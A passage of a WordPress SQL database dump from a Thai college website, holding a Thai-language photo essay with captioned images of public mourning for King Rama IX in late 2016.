/></p>\r\n<p class=\"alignnone\" style=\"text-align: center;\">เจ้าหน้าที่ตํารวจปฏิบัติหน้าที่บริเวณถนนหน้าพระลาน เพื่อจัดระเบียบและอํานวยความสะดวกแก่ประชาชนที่เข้ามาร่วมถวายสักการะพระบรมศพในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\"> “แต่งดํา ทั้งเมือง”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4318 size-large\" src=\"/wp-content/uploads/2018/11/21-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />บรรยากาศการไว้อาลัยแด่ในหลวงรัชกาลที่ 9 ณ สถานีรถไฟฟ้ า BTS สยาม</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ชาวมอญ”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4319 size-large\" src=\"/wp-content/uploads/2018/11/23-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ประชาชนที่มาถวายความอาลัยในหลวงรัชกาลที่ 9 ณ พระบรมหาราชวัง มักแต่งกายด้วยเสื้อผ้าสีดําเป็นหลัก แต่มีพสกนิกรอีกจํานวนไม่น้อย โดยเฉพาะกลุ่มชาติพันธุ์ต่าง ๆ ที่เลือกใส่เสื้อผ้าอาภรณ์อันเป็นเอกลักษณ์ ของกลุ่มตนเองมาถวายความอาลัยแทนเสื้อผ้าสีดํา เช่น ชาวไทยเชื้อสายมอญจากอําเภอสังขละบุรี จังหวัดกาญจนบุรีที่มากราบสักการะพระบรมศพในหลวงรัชกาลที่ 9 ในชุดแต่งกายประจําถิ่น</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เก็บไว้ในความทรงจํา”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4320 size-large\" src=\"/wp-content/uploads/2018/11/24-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />นอกจากจุดเทียนและวางดอกไม้เพื่อแสดงความอาลัย ณ บริเวณกําแพงด้านหน้าพระบรมมหาราชวังแล้ว ประชาชนจํานวนมากยังได้ซื้อหาพระบรมสาทิสลักษณ์ และพระบรมฉายาลักษณ์ที่พ่อค้าแม่ค้าจํานวนมากมาจําหน่ายเพื่อเก็บไว้เป็นความทรงจํา</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ในเวลากลางคืน บริเวณถนนรอบพระบรมมหาราชวัง\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4321 size-large\" src=\"/wp-content/uploads/2018/11/27-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />คลาคลํ่าไปด้วยผู้คนที่มาแสดงความอาลัยและถ่ายรูปเป็นที่ระลึก จุดหนึ่งที่เป็นที่นิยมในการถ่ายรูป คือ ด้านหน้าประตูวิมานเทเวศร์ ที่สามารถมองเห็นพระที่นั่งดุสิตมหาปราสาท ซึ่งเป็นที่ประดิษฐานพระบรมศพของในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ครอบครัวพาสมาชิกตัวน้อยมาร่วมวางดอกไม้ ณ ริมกํา แพงพระบรมมหาราชวัง\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4322 size-large\" src=\"/wp-content/uploads/2018/11/32-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />เพื่อแสดงความอาลัยต่อการเสด็จสวรรคตของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช และร่วมเป็นส่วนหนึ่งในช่วงเวลาที่สําคัญที่สุดของคนไทยทั้งประเทศ</p>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4323 size-large\" src=\"/wp-content/uploads/2018/11/37-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\"> “ข้างกําแพงวัง”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4324 size-large\" src=\"/wp-content/uploads/2018/11/38-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ในวันที่พ่อจากไป...”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4325 size-large\" src=\"/wp-content/uploads/2018/11/42-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ศูนย์การค้าแห่งหนึ่งจัดงานรําลึกและจุดเทียนถวายความอาลัยแด่ในหลวงรัชกาลที่ 9 ซึ่งในงานมีการแจกภาพในหลวงและลงนามถวายความอาลัย</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“กราบรําลึกถึงพระองค์”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4326 size-large\" src=\"/wp-content/uploads/2018/11/43-Arun-Roysri-copy-1024x576.jpg\" alt=\"\" width=\"640\" height=\"360\" />ราว 2 ทุ่ม ของวันพฤหัสบดีที่ 27 ตุลาคม พ.ศ. 2559 ชาวโพธาราม จังหวัดราชบุรีและอําเภอใกล้เคียง ได้มารวมตัวกันจุดเทียนสีขาว ร้องเพลงสรรเสริญพระบารมี และกราบพระบรมฉายาลักษณ์ของในหลวงรัชกาลที่ 9 ณ บริเวณหาดทรายโพธารามริมแม่นํ้าแม่กลอง ด้วยความอาลัยและรําลึกถึงพระมหากรุณาธิคุณของพระองค์</p>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4327 size-large\" src=\"/wp-content/uploads/2018/11/54-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เฝ้ารอ...”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4328 size-large\" src=\"/wp-content/uploads/2018/11/55-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ประชาชนตลอดสองฝั่งถนนรอรับขบวนเสด็จพระบรมวงศานุวงศ์ ที่เสด็จมาประกอบพิธีทางศาสนา เมื่อเสร็จพิธีเจ้าหน้าที่จะอนุญาตให้ประชาชน\r\nเข้าไปวางดอกไม้และจุดเทียนรอบกําแพงพระบรมมหาราชวัง</p>\r\n\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><span style=\"color: #993300;\">“เสียงประสานจากใจ”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4329 size-large\" src=\"/wp-content/uploads/2018/11/57-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ประชาชนที่ร่วมกันร้องเพลงสรรเสริญพระบารมีและจุดเทียนถวายความอาลัย บริเวณท้องสนามหลวงและรอบกําแพงพระบรมมหาราชวัง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ในเวลากลางคืน บริเวณถนนรอบพระบรมมหาราชวัง\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4330 size-large\" src=\"/wp-content/uploads/2018/11/59-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />คลาคลํ่าไปด้วยผู้คนที่มาแสดงความอาลัยและถ่ายรูปเป็นที่ระลึกจุดหนึ่งที่เป็นที่นิยมในการถ่ายรูป คือ ด้านหน้าประตูวิมานเทเวศร์ ที่สามารถมองเห็นพระที่นั่งดุสิตมหาปราสาท ซึ่งเป็นที่ประดิษฐาน พระบรมศพของในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เทียนและดอกไม้แห่งการรําลึก”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4331 size-large\" src=\"/wp-content/uploads/2018/11/62-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ช่วงแรกหลังจากการสวรรคตของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดชประชาชนจะนําเทียนและดอกไม้มากราบไหว้ เพื่อเป็นการแสดงความอาลัยต่อพระองค์ทุกคนต่างมาด้วยความรู้สึกโศกเศร้าเสียใจอย่างสุดซึ้ง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“สวดมนต์ ภาวนา”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4332 size-large\" src=\"/wp-content/uploads/2018/11/64-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />แม่ชีและนักศึกษาร่วมกันนั่งสวดมนต์ภาวนา เพื่อถวายเป็นพระราชกุศลแด่ในหลวงรัชกาลที่ 9 ณ ท้องสนามหลวง</p>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4333 size-large\" src=\"/wp-content/uploads/2018/11/70-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ตามรอยเส้นทางพระราชดําเนิน”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4334 size-large\" src=\"/wp-content/uploads/2018/11/72-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />เจริญ นักรบไพร ชาวบ้านหมู่บ้านห้วยห้อม จังหวัดแม่ฮ่องสอน ถือพระบรมฉายาลักษณ์ของในหลวงรัชกาลที่ 9 ขณะเสด็จพระราชทานฝูงแกะในพื้นที่หมู่บ้านห้วยห้อมแก่ประชาชน และต่อมาพระองค์ได้ริเริ่มโครงการพระราชดําริ อันส่งผลให้ชาวบ้านห้วยห้อมมีชีวิตความเป็นอยู่ที่ดีขึ้น</p>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4335 size-large\" src=\"/wp-content/uploads/2018/11/73-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ในวันที่ 11 ธันวาคม พ.ศ. 2559 กลุ่มชาติพันธุ์ที่อาศัยอยู่ในจังหวัดทางภาคเหนือและภาคตะวันออกเฉียงเหนือ จํานวน 41 กลุ่ม พร้อมใจเดินทางมายังพระบรมมหาราชวัง เพื่อมาถวายสักการะพระบรมศพพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช เบื้องหน้าพระบรมโกศ ณ พระที่นั่งดุสิตมหาปราสาท พร้อมทั้งประกอบพิธีส่งดวงพระวิญญาณของในหลวงรัชกาลที่ 9 ตามแบบแผนประเพณีของแต่ละกลุ่มชาติพันธุ์ด้วย</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ครั้งหนึ่งในชีวิต”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4336 size-large\" src=\"/wp-content/uploads/2018/11/74-Arun-Roysri-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />หญิงชาวอิวเมี่ยน (เมี่ยน) ในชุดแต่งกายประจํากลุ่มชาติพันธุ์ที่โดดเด่นด้วยผ้าโพกศีรษะขนาดใหญ่สีดํากับลวดลายที่วิจิตรบรรจงตรงด้านบนศีรษะและไหมพรมสีแดงอ่อนที่พันอยู่รอบคอที่ดูตัดกับเสื้อผ้าสีดําอย่างโดดเด่นกําลังนั่งรอเข้ากราบพระบรมศพในหลวงรัชกาลที่ 9 ในบริเวณพระบรมหาราชวัง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"การแสดงพลังของเหล่านักเรียนชั้นมัธยมศึกษาโรงเรียนอัสสัมชัญ\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4337 size-large\" src=\"/wp-content/uploads/2018/11/76-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />เขตบางรัก กรุงเทพฯ ด้วยการแปรอักษรเป็นพระบรมฉายาลักษณ์ ทั้งหมด 11 ภาพ ที่มีทั้งความงดงาม ความพร้อมเพรียง และความทุ่มเท</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ด้วยความไร้เดียงสา\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4338 size-large\" src=\"/wp-content/uploads/2018/11/77-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />เด็ก ๆ ตื่นเต้นกับการได้จุดเทียนและร้องเพลงสรรเสริญพระบารมี ในงานถวายความอาลัยแด่พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ณ บริเวณริมแม่นํ้าแม่กลอง จังหวัดราชบุรี</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ประสานเสียง”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4339 size-large\" src=\"/wp-content/uploads/2018/11/81-Arun-Roysri-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />นักเรียนระดับอนุบาลร้องเพลงประสานเสียง “ลูกของพ่อ” และ “พระราชาในนิทาน” ในงานถวายความอาลัยแด่พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ณ สนามกีฬาไอโมบาย จังหวัดบุรีรัมย์</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ณ กําแพงบ้านพ่อ”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4340 size-large\" src=\"/wp-content/uploads/2018/11/91-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>', 'ภาพถ่าย โดย อรุณ ร้อยศรี', '', 'inherit', 'closed', 'closed', '', '4341-revision-v1', '', '', '2018-11-12 14:33:11', '2018-11-12 07:33:11', '', 4341, 'http://www.technicrayong.ac.th/4341-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(4392, 3, '2018-11-12 14:35:31', '2018-11-12 07:35:31', '<h3 style=\"text-align: right;\"><span class=\"fontstyle0\" style=\"color: #993300;\">“พิธีจุดเทียนถวายความอาลัยและสวดมนต์ข้ามปี ของชาวเมืองบุรีรัมย์”</span></h3>\r\n<img class=\"wp-image-4313 size-large alignright\" src=\"/wp-content/uploads/2018/11/2-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<h3 style=\"text-align: center;\">พระภิกษุชาวเมืองบุรีรัมย์และจังหวัดใกล้เคียงร่วมกันทําพิธีสวดมนต์ข้ามปี เนื่องในวันสิ้นปี และถวายความอาลัยแด่ในหลวงรัชกาลที่ 9</h3>\r\n<h3></h3>\r\n<h3></h3>\r\n<h3></h3>\r\n<h3></h3>\r\n<h3></h3>\r\n<h3></h3>\r\n<h3 style=\"text-align: left;\"><span style=\"color: #993300;\">“ภาพจากพลังความตั้งใจ”</span></h3>\r\n<img class=\"wp-image-4314 size-large alignleft\" src=\"/wp-content/uploads/2018/11/3-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<h3 style=\"text-align: center;\">การแสดงพลังของเหล่านักเรียนชั้นมัธยมศึกษาโรงเรียนอัสสัมชัญ เขตบางรัก กรุงเทพฯ ด้วยการแปรอักษรเป็นพระบรมฉายาลักษณ์ ทั้งหมด 11 ภาพ ที่มีทั้งความงดงาม ความพร้อมเพรียง และความทุ่มเท</h3>\r\n<h3></h3>\r\n<h3></h3>\r\n<h3></h3>\r\n<h3></h3>\r\n<h3></h3>\r\n<h3></h3>\r\n<h3></h3>\r\n<h3></h3>\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เพื่อประชาชนด้วยพระหัตถ์ของพระองค์เอง”</span></h3>\r\n<img class=\"aligncenter wp-image-4315 size-large\" src=\"/wp-content/uploads/2018/11/4-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">พระเจ้าวรวงศ์เธอ พระองค์เจ้าโสมสวลี พระวรราชาทินัดดามาตุ ทรงประกอบอาหารด้วยพระองค์เอง เพื่อประทานแก่ประชาชนที่เข้ามากราบพระบรมศพในหลวงรัชกาลที่ 9 ณ บริเวณท้องสนามหลวง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“พิธีสวดมิสซา”</span></h3>\r\n<p style=\"text-align: center;\"><img class=\"wp-image-4316 size-large aligncenter\" src=\"/wp-content/uploads/2018/11/12-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />การสวดมิสซาในโบสถ์อัสสัมชัญบางรัก กรุงเทพฯ เพื่อแสดงการไว้อาลัยต่อการจากไปของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“การปฏิบัติงานของเจ้าหน้าที่”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"wp-image-4317 size-large aligncenter\" src=\"/wp-content/uploads/2018/11/17-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n<p class=\"alignnone\" style=\"text-align: center;\">เจ้าหน้าที่ตํารวจปฏิบัติหน้าที่บริเวณถนนหน้าพระลาน เพื่อจัดระเบียบและอํานวยความสะดวกแก่ประชาชนที่เข้ามาร่วมถวายสักการะพระบรมศพในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\"> “แต่งดํา ทั้งเมือง”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4318 size-large\" src=\"/wp-content/uploads/2018/11/21-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />บรรยากาศการไว้อาลัยแด่ในหลวงรัชกาลที่ 9 ณ สถานีรถไฟฟ้ า BTS สยาม</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ชาวมอญ”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4319 size-large\" src=\"/wp-content/uploads/2018/11/23-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ประชาชนที่มาถวายความอาลัยในหลวงรัชกาลที่ 9 ณ พระบรมหาราชวัง มักแต่งกายด้วยเสื้อผ้าสีดําเป็นหลัก แต่มีพสกนิกรอีกจํานวนไม่น้อย โดยเฉพาะกลุ่มชาติพันธุ์ต่าง ๆ ที่เลือกใส่เสื้อผ้าอาภรณ์อันเป็นเอกลักษณ์ ของกลุ่มตนเองมาถวายความอาลัยแทนเสื้อผ้าสีดํา เช่น ชาวไทยเชื้อสายมอญจากอําเภอสังขละบุรี จังหวัดกาญจนบุรีที่มากราบสักการะพระบรมศพในหลวงรัชกาลที่ 9 ในชุดแต่งกายประจําถิ่น</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เก็บไว้ในความทรงจํา”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4320 size-large\" src=\"/wp-content/uploads/2018/11/24-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />นอกจากจุดเทียนและวางดอกไม้เพื่อแสดงความอาลัย ณ บริเวณกําแพงด้านหน้าพระบรมมหาราชวังแล้ว ประชาชนจํานวนมากยังได้ซื้อหาพระบรมสาทิสลักษณ์ และพระบรมฉายาลักษณ์ที่พ่อค้าแม่ค้าจํานวนมากมาจําหน่ายเพื่อเก็บไว้เป็นความทรงจํา</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ในเวลากลางคืน บริเวณถนนรอบพระบรมมหาราชวัง\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4321 size-large\" src=\"/wp-content/uploads/2018/11/27-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />คลาคลํ่าไปด้วยผู้คนที่มาแสดงความอาลัยและถ่ายรูปเป็นที่ระลึก จุดหนึ่งที่เป็นที่นิยมในการถ่ายรูป คือ ด้านหน้าประตูวิมานเทเวศร์ ที่สามารถมองเห็นพระที่นั่งดุสิตมหาปราสาท ซึ่งเป็นที่ประดิษฐานพระบรมศพของในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ครอบครัวพาสมาชิกตัวน้อยมาร่วมวางดอกไม้ ณ ริมกํา แพงพระบรมมหาราชวัง\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4322 size-large\" src=\"/wp-content/uploads/2018/11/32-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />เพื่อแสดงความอาลัยต่อการเสด็จสวรรคตของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช และร่วมเป็นส่วนหนึ่งในช่วงเวลาที่สําคัญที่สุดของคนไทยทั้งประเทศ</p>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4323 size-large\" src=\"/wp-content/uploads/2018/11/37-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\"> “ข้างกําแพงวัง”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4324 size-large\" src=\"/wp-content/uploads/2018/11/38-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ในวันที่พ่อจากไป...”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4325 size-large\" src=\"/wp-content/uploads/2018/11/42-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ศูนย์การค้าแห่งหนึ่งจัดงานรําลึกและจุดเทียนถวายความอาลัยแด่ในหลวงรัชกาลที่ 9 ซึ่งในงานมีการแจกภาพในหลวงและลงนามถวายความอาลัย</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“กราบรําลึกถึงพระองค์”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4326 size-large\" src=\"/wp-content/uploads/2018/11/43-Arun-Roysri-copy-1024x576.jpg\" alt=\"\" width=\"640\" height=\"360\" />ราว 2 ทุ่ม ของวันพฤหัสบดีที่ 27 ตุลาคม พ.ศ. 2559 ชาวโพธาราม จังหวัดราชบุรีและอําเภอใกล้เคียง ได้มารวมตัวกันจุดเทียนสีขาว ร้องเพลงสรรเสริญพระบารมี และกราบพระบรมฉายาลักษณ์ของในหลวงรัชกาลที่ 9 ณ บริเวณหาดทรายโพธารามริมแม่นํ้าแม่กลอง ด้วยความอาลัยและรําลึกถึงพระมหากรุณาธิคุณของพระองค์</p>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4327 size-large\" src=\"/wp-content/uploads/2018/11/54-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เฝ้ารอ...”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4328 size-large\" src=\"/wp-content/uploads/2018/11/55-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ประชาชนตลอดสองฝั่งถนนรอรับขบวนเสด็จพระบรมวงศานุวงศ์ ที่เสด็จมาประกอบพิธีทางศาสนา เมื่อเสร็จพิธีเจ้าหน้าที่จะอนุญาตให้ประชาชน\r\nเข้าไปวางดอกไม้และจุดเทียนรอบกําแพงพระบรมมหาราชวัง</p>\r\n\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><span style=\"color: #993300;\">“เสียงประสานจากใจ”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4329 size-large\" src=\"/wp-content/uploads/2018/11/57-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ประชาชนที่ร่วมกันร้องเพลงสรรเสริญพระบารมีและจุดเทียนถวายความอาลัย บริเวณท้องสนามหลวงและรอบกําแพงพระบรมมหาราชวัง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ในเวลากลางคืน บริเวณถนนรอบพระบรมมหาราชวัง\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4330 size-large\" src=\"/wp-content/uploads/2018/11/59-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />คลาคลํ่าไปด้วยผู้คนที่มาแสดงความอาลัยและถ่ายรูปเป็นที่ระลึกจุดหนึ่งที่เป็นที่นิยมในการถ่ายรูป คือ ด้านหน้าประตูวิมานเทเวศร์ ที่สามารถมองเห็นพระที่นั่งดุสิตมหาปราสาท ซึ่งเป็นที่ประดิษฐาน พระบรมศพของในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เทียนและดอกไม้แห่งการรําลึก”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4331 size-large\" src=\"/wp-content/uploads/2018/11/62-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ช่วงแรกหลังจากการสวรรคตของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดชประชาชนจะนําเทียนและดอกไม้มากราบไหว้ เพื่อเป็นการแสดงความอาลัยต่อพระองค์ทุกคนต่างมาด้วยความรู้สึกโศกเศร้าเสียใจอย่างสุดซึ้ง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“สวดมนต์ ภาวนา”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4332 size-large\" src=\"/wp-content/uploads/2018/11/64-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />แม่ชีและนักศึกษาร่วมกันนั่งสวดมนต์ภาวนา เพื่อถวายเป็นพระราชกุศลแด่ในหลวงรัชกาลที่ 9 ณ ท้องสนามหลวง</p>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4333 size-large\" src=\"/wp-content/uploads/2018/11/70-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ตามรอยเส้นทางพระราชดําเนิน”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4334 size-large\" src=\"/wp-content/uploads/2018/11/72-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />เจริญ นักรบไพร ชาวบ้านหมู่บ้านห้วยห้อม จังหวัดแม่ฮ่องสอน ถือพระบรมฉายาลักษณ์ของในหลวงรัชกาลที่ 9 ขณะเสด็จพระราชทานฝูงแกะในพื้นที่หมู่บ้านห้วยห้อมแก่ประชาชน และต่อมาพระองค์ได้ริเริ่มโครงการพระราชดําริ อันส่งผลให้ชาวบ้านห้วยห้อมมีชีวิตความเป็นอยู่ที่ดีขึ้น</p>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4335 size-large\" src=\"/wp-content/uploads/2018/11/73-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ในวันที่ 11 ธันวาคม พ.ศ. 2559 กลุ่มชาติพันธุ์ที่อาศัยอยู่ในจังหวัดทางภาคเหนือและภาคตะวันออกเฉียงเหนือ จํานวน 41 กลุ่ม พร้อมใจเดินทางมายังพระบรมมหาราชวัง เพื่อมาถวายสักการะพระบรมศพพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช เบื้องหน้าพระบรมโกศ ณ พระที่นั่งดุสิตมหาปราสาท พร้อมทั้งประกอบพิธีส่งดวงพระวิญญาณของในหลวงรัชกาลที่ 9 ตามแบบแผนประเพณีของแต่ละกลุ่มชาติพันธุ์ด้วย</p>\r\n\r\n<h3 style=\"text-align: 